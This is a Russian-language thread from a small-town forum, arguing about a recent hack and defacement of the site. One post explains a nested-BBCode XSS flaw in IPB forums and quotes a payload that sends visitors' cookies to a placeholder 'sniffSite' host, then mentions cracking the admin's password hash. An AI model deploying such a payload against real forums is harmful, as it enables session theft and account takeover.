Форум жив

Статус
В этой теме нельзя размещать новые ответы.

Кирилл

Active Member
Прежде всего спасибо анонимному хакеру что напомнил всем посетителям сайта ахтубинск.ру о существовании уязвимости в форуме. Благодаря тебе форум не работал 2 дня. Убедительная просьба: в следующий раз, если найдешь чего лучше сообщи мне по почте, вместо того чтобы таким образом гадить.
Ну да ладно.
Мы перешли на новую версию форума, если найдете какие глюки - сообщайте мне :D.

Кирилл

Active Member
Исправил глюк с запоминанием пользователя при входе, сейчас все работает :D .

"о существовании уязвимости в форуме"

С этого момента можно по подробней.

А так даже удобней .... :)

ak-flash

New Member
Суть уязвимости
Уязвимость проявляется при вставке одного BB тега, в качестве аргумента другого BB тега (спаренные теги). При этом, оба тега парсятся в соответствующие HTML теги, но поскольку один из них оказывается внутри атрибутов другого, то структура HTML нарушается. Нарушение структуры может быть использовано для вставки произвольного скрипта.
Уязвимость позволяет завладеть админскими полномочиями. В данном случае, скрипт для получения куков форума IPB может выглядеть например так:

[color="img srchttpaaaaaaaajpg border0 alt "]` style=background:url(java script:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/color]

После расшифровки MD5-хеша пароля администратора, становится возможным дефейс сайта!!!

Кирилл

Active Member
ak-flash
Обновляли чтобы ты снова все испортил?
А зачем ты вообще делал дефейс сайта? Тебе что, заняться больше нечем, кроме того, как страдать х**ней на сайте своего города?

Мария

стерва форума
Ух ты! Судя по пропаже наших с Анной последних сообщений, юного хакера они задели за живое. Видать и впрям девки не дают... B)

Анна

умница и красавица
А теперь, ИМХО - и надежда на присутствующих умерла B)

Анна

умница и красавица
2 last
А ты-то чего обижаешься? Или тоже надежды лелеял? B)

i_am_d

New Member
Пора бы починить BBCode.
Как считаете?

К вопросу взломов. Вы же прекрасно понимаете, что у вас ещё есть дыры. Нет, я даже скажу, они были есть и будут. И не надо страдать одним делом, задавая вопросы:
"А зачем ты вообще делал дефейс сайта? Тебе что, заняться больше нечем, кроме того, как страдать х**ней на сайте своего города?"

Вспоминайте, кого обидели, с кем плохо обошлись.
© i_am_d

Знайте, с кем дружить.
Успехов.

Анна

умница и красавица
2 last

Какое детство...
Типа, "обидели мышку, напИсали в норку" - а теперь, "я мстю, и мстя моя ужасна" - неумно, по-меньшей мере.
А ценные советы, типа "знайте, с кем дружить" - вообще, из области "забирай свои игрушки".

i_am_d

New Member
Это не ценный совет. Это даже не совет.
Ценные советы заслуживаются ценным отношением.
Увы. Не было ценного отношения. Не было.
B)

[closed]

Анна

умница и красавица
"обнять и плакать" (с) B)

P.S. Ценное отношение тоже нужно заслужить. Или Заратустра не позволяет? :)

A

Altelia

Guest
Ух ты! Судя по пропаже наших с Анной последних сообщений, юного хакера они задели за живое. Видать и впрям девки не дают... 
А теперь, ИМХО - и надежда на присутствующих умерла 
ой девчонки ну и насмешили)))))

у кого чего болит, тот о том и говорит)))
люблю эту пословицу..ай как люблю) всё отражает) и весь форум вместе со всеми это отражает)

В команду Ахт-к. ру надо такого парнишку.. подружитесь с земляком B) ай молодец ) такие люди очень даже необходимы...они шевелят "болотце"...немного)))

НО!
to ХАЦКЕР)): "сила есть -ума не надо"...
лучше твори добро Земляк)) и тебя вспомнят хорошим словом :)

Анна

умница и красавица
Видишь ли, Светик, "у кого что болит" - не тот случай))
У нас мужья молоды, активны, полны любви и сил, так что мы напротив - можем понять, что двигает юношей, совершающим подобные выходки.

всё отражает) и весь форум вместе со всеми это отражает)
А вот это вообще к чему? :)

В команду Ахтубинск ру - таких всё-таки не надо, желательно с умом чтобы. B)

A

Altelia

Guest
Видишь ли, Светик, "у кого что болит" - не тот случай))
У нас мужья молоды, активны, полны любви и сил, так что мы напротив - можем понять, что двигает юношей, совершающим подобные выходки.

:) я очень рада))) а то уже засомневалась)))

либидо конечно имеет огромную роль)))) это да)))
может его не хватает на форуме B) ? а какой ум в команде ахт-к.ру нужен.. ?

видишь, парень нашёл изъян.. разве это плохо..?
другое дело , что показал не правильно.. так это поправимо... все люди ошибаются.. может в другой раз он и не сделает.. такого..может) вдруг с Кириллом свяжется... и скажет.... Кирилл, Дружище) Земляк) я ещё нашёл изъян)).. а может и нет) не только от него это зависит) (основная проблема молодёжи, кстати) ...
а говорить, что человек не умён... это ты много на себя берёшь) хотя если берёшь))) значит ответить сможешь) ?

Анна

умница и красавица
я очень рада))) а то уже засомневалась)))
Странно...на каком основании? B)

а какой ум в команде ахт-к.ру нужен.. ?
Светик, не передергивай, ай-ай-ай... Разговор был о том, что НЕ НУЖЕН команде неумный человек.

видишь, парень нашёл изъян.. разве это плохо..?
другое дело , что показал не правильно.. так это поправимо... все люди ошибаются.. может в другой раз он и не сделает.. такого..может) вдруг с Кириллом свяжется... и скажет.... Кирилл, Дружище) Земляк) я ещё нашёл изъян)).. а может и нет) не только от него это зависит) (основная проблема молодёжи, кстати) ...
Парень нашел - хорошо. Но ты, видимо, не в курсе тех вещей, что происходили попутно, так что - извини, ты не понимаешь, о чем говоришь.
А к чему тут основная проблема молодежи???

а говорить, что человек не умён... это ты много на себя берёшь) хотя если берёшь))) значит ответить сможешь) ?
Отвечаю - видишь ли, ум и интеллект - всё-таки разные вещи, по определению. Юный хакер интеллектом не обижен, но вот с умом - явный дефицит.

A

Altelia

Guest
А к чему тут основная проблема молодежи???
отвечаю B)
основная проблема нашей молодёжи в том.. что она не может себя реализовать правильно... направить свои действия, знания на созидание, а не на разрушение увы..сама ( молодёжь) очень редко это может..слишком много сфер влияния...но это в другой теме ...

а Ум и Интеллект... смотря какие и чьи определения рассматривать)
Всё же интеллект является неотъемлемой частью Ума... а Ум... неотъемлемой часть Разума...
в этом случае, чтобы тут ни произошло.. пусть я не знаю всех подробностей... играет роль лишь.. негативная направленность человека на общество, общественность... человек озлоблен.. это не признак ума.. это не признак его глупости...
хехе, а возможно у него просто "спортивный" интерес) и он "Злой Гений" :)

IMHO - не подразделяю людей на умных и глупых...ибо в каждом человеке есть всё) ... Есть Добро, а есть Зло... вот единственное, на что обращаю внимание...
а молодой ХаЦкер ищет себя... так вот жаль, что не Мы нашли его первыми :D эх...не дали бы сойти с пути истиного))), но....значит так должно было быть)

Мария

стерва форума
Светлана написал(а):
ой девчонки ну и насмешили)))))

у кого чего болит, тот о том и говорит)))
люблю эту пословицу..ай как люблю) всё отражает) и весь форум вместе со всеми это отражает)
А что? Все правильно.
Ну не дают мне девки

Статус
В этой теме нельзя размещать новые ответы.
Сверху